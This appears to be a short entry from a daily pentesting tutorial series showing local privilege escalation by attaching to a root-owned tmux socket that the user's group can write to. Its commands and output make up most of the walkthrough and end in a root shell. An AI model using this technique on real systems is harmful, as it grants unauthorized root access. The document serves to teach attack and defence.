Day 69: Hijacking Tmux Sessions 2 Priv. Esc.
Tmux is a terminal multiplexer for Unix-like operating systems. It allows multiple terminal sessions to be accessed simultaneously in a single window. It is useful for running more than one command-line program at the same time
Tmux can be prone to a local privilege-escalation vulnerability because it fails to properly drop group permissions obtained through setGID.
There was a great advisory some years back where you could just run -S with anything…
Using Tmux to Priv. Esc.
Look for root /usr/bin/tmux running process that allows our group to rw in order to hijack root shell
Check for process…
user@box:/# ps -u root
/usr/bin/tmux -S /.devs/dev_sess
Check we can read/write…
user@box:/# ls -la /.devs/dev_sess
srw-rw---- 1 root usergroup
Now do the same command you see running in your user terminal that has group membership allowing rw to attach to the session…
user@box:/# tmux -S /.devs/dev_sess
uid=0(root) gid=0(root) groups=0(root)